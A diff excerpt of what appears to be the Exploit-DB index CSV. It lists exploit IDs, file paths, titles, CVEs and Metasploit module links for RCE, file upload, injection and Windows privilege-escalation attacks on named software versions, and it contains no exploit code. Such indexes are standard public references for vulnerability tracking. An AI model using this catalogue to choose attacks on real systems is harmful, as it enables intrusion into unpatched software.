51493,exploits/multiple/remote/51493.rb,"Flexense HTTP Server 10.6.24 - Buffer Overflow (DoS) (Metasploit)",2023-05-31,"Ege Balci",remote,multiple,,2023-05-31,2023-05-31,0,CVE-2018-8065,,,,,
34500,exploits/multiple/remote/34500.html,"Flock Browser 3.0.0 - Malformed Bookmark HTML Injection",2010-08-19,Lostmon,remote,multiple,,2010-08-19,2014-09-01,1,CVE-2010-3202;OSVDB-67969,,,,,https://www.securityfocus.com/bid/42556/info
@ -13124,6 +13127,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
46627,exploits/php/remote/46627.rb,"CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit)",2019-03-28,Metasploit,remote,php,80,2019-03-28,2019-03-28,1,CVE-2019-9692,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/cmsms_showtime2_rce.rb
21334,exploits/php/remote/21334.pl,"Cobalt RaQ 2.0/3.0/4.0 XTR - 'MultiFileUpload.php' Authentication Bypass (1)",2002-03-08,"Wouter ter Maat",remote,php,,2002-03-08,2012-09-17,1,CVE-2002-0430;OSVDB-13161,,,,,https://www.securityfocus.com/bid/4252/info
21335,exploits/php/remote/21335.sh,"Cobalt RaQ 2.0/3.0/4.0 XTR - 'MultiFileUpload.php' Authentication Bypass (2)",2002-03-08,"Wouter ter Maat",remote,php,,2002-03-08,2012-09-17,1,CVE-2002-0430;OSVDB-13161,,,,,https://www.securityfocus.com/bid/4252/info
52272,exploits/php/remote/52272.txt,"code-projects Online Exam Mastering System 1.0 - Reflected Cross-Site Scripting (XSS)",2025-04-22,"Pruthu Raut",remote,php,,2025-04-22,2025-04-22,0,CVE-2025-28121,,,,,
46698,exploits/php/remote/46698.rb,"CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit)",2019-04-15,AkkuS,remote,php,,2019-04-15,2021-03-18,1,CVE-2019-11447,"Metasploit Framework (MSF)",,,http://www.exploit-db.comcutenews.2.1.2.zip,
24444,exploits/php/remote/24444.rb,"DataLife Engine - 'preview.php' PHP Code Injection (Metasploit)",2013-02-01,Metasploit,remote,php,,2013-02-01,2013-02-01,1,CVE-2013-7387;OSVDB-89662;CVE-2013-1412,"Metasploit Framework (MSF)",,,http://www.exploit-db.comDataLife_Engine_9.7_Win-1251_Final_English_By_DLEVIET_22.11.2012.rar,
31695,exploits/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,remote,php,,2014-02-16,2014-02-16,1,OSVDB-103387,"Metasploit Framework (MSF)",,,,
@ -13310,6 +13314,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28407,exploits/php/remote/28407.rb,"Western Digital Arkeia < 10.0.10 - Remote Code Execution (Metasploit)",2013-09-20,xistence,remote,php,,2013-09-20,2017-04-01,1,OSVDB-97615,"Metasploit Framework (MSF)",,http://www.exploit-db.com/screenshots/idlt28500/screen-shot-2013-09-22-at-42116-pm.png,,
43356,exploits/php/remote/43356.rb,"Western Digital MyCloud - 'multi_uploadify' File Upload (Metasploit)",2017-12-18,Metasploit,remote,php,,2017-12-18,2017-12-18,1,CVE-2017-17560,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/c6a2ae2551af262e42c9b14ac3d212c978f7dbf2/modules/exploits/linux/http/wd_mycloud_multiupload_upload.rb
40004,exploits/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload (Metasploit)",2016-06-22,s0nk3y,remote,php,80,2016-06-22,2016-06-22,0,CVE-2015-6567;CVE-2015-6568,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwolfcms-0.8.1.tar.gz,
52271,exploits/php/remote/52271.py,"WonderCMS 3.4.2 - Remote Code Execution (RCE)",2025-04-22,"Milad karimi",remote,php,,2025-04-22,2025-04-22,0,CVE-2023-41425,,,,,
46662,exploits/php/remote/46662.rb,"WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit)",2019-04-05,Metasploit,remote,php,80,2019-04-05,2019-04-05,1,CVE-2019-8943;CVE-2019-8942,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/wp_crop_rce.rb
23856,exploits/php/remote/23856.rb,"WordPress Plugin Advanced Custom Fields - Remote File Inclusion (Metasploit)",2013-01-03,Metasploit,remote,php,,2013-01-03,2013-01-03,1,OSVDB-87353,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/51037/
23856,exploits/php/remote/23856.rb,"WordPress Plugin Advanced Custom Fields - Remote File Inclusion (Metasploit)",2013-01-03,Metasploit,remote,php,,2013-01-03,2013-01-03,1,OSVDB-87353,"WordPress Plugin",,,,http://secunia.com/advisories/51037/
@ -33062,6 +33067,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47557,exploits/php/webapps/47557.txt,"WordPress Core 5.2.4 - Cross-Origin Resource Sharing",2019-10-29,"Milad Khoshdel",webapps,php,,2019-10-29,2019-12-21,0,,,,,,
47720,exploits/php/webapps/47720.txt,"WordPress Core 5.3 - User Disclosure",2019-11-28,SajjadBnd,webapps,php,,2019-11-28,2019-12-21,0,,,,,,
50663,exploits/php/webapps/50663.txt,"WordPress Core 5.8.2 - 'WP_Query' SQL Injection",2022-01-13,"Aryan Chehreghani",webapps,php,,2022-01-13,2022-01-13,0,CVE-2022-21661,,,,,
52274,exploits/php/webapps/52274.py,"WordPress Core 6.2 - Directory Traversal",2025-04-22,"Milad karimi",webapps,php,,2025-04-22,2025-04-22,0,CVE-2023-2745,,,,,
29754,exploits/php/webapps/29754.html,"WordPress Core < 2.1.2 - 'PHP_Self' Cross-Site Scripting",2007-03-19,"Alexander Concha",webapps,php,,2007-03-19,2017-05-04,1,CVE-2007-1622;OSVDB-34348,,,,http://www.exploit-db.comWordPress-2.1.2.zip,https://www.securityfocus.com/bid/23027/info
10089,exploits/php/webapps/10089.txt,"WordPress Core < 2.8.5 - Unrestricted Arbitrary File Upload / Arbitrary PHP Code Execution",2009-11-11,"Dawid Golunski",webapps,php,,2009-11-10,2017-05-04,1,CVE-2009-3890;OSVDB-59958,,,,http://www.exploit-db.comwordpress-2.8.5.tar.gz,
41497,exploits/php/webapps/41497.php,"WordPress Core < 4.7.1 - Username Enumeration",2017-03-03,Dctor,webapps,php,,2017-03-03,2017-05-04,0,CVE-2017-5487,,,,http://www.exploit-db.comwordpress-4.7.1.zip,
@ -41266,6 +41272,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,,2019-07-12,2019-07-12,1,CVE-2019-1019,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1817
51946,exploits/windows/local/51946.rb,"Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation",2024-04-02,"E1 Coders",local,windows,,2024-04-02,2024-04-02,0,CVE-2024-21338,,,,,
51733,exploits/windows/local/51733.txt,"Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)",2023-10-09,"Moein Shahabi",local,windows,,2023-10-09,2023-10-09,0,,,,,,
52275,exploits/windows/local/52275.c,"Microsoft Windows 11 - Kernel Privilege Escalation",2025-04-22,"Milad karimi",local,windows,,2025-04-22,2025-04-22,0,CVE-2024-21338,,,,,
52270,exploits/windows/local/52270.c,"Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege",2025-04-22,"Milad karimi",local,windows,,2025-04-22,2025-04-22,0,CVE-2024-49138,,,,,
40219,exploits/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",local,windows,,2016-08-08,2016-08-08,1,CVE-2016-3223;MS16-072,,,,,
14733,exploits/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking",2010-08-24,TheLeader,local,windows,,2010-08-25,2010-08-25,0,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,,
39788,exploits/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Local Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,local,windows,,2016-05-09,2016-10-10,1,CVE-2016-0051;MS16-016,,,http://www.exploit-db.com/screenshots/idlt40000/eop2.png,,

Can't render this file because it is too large.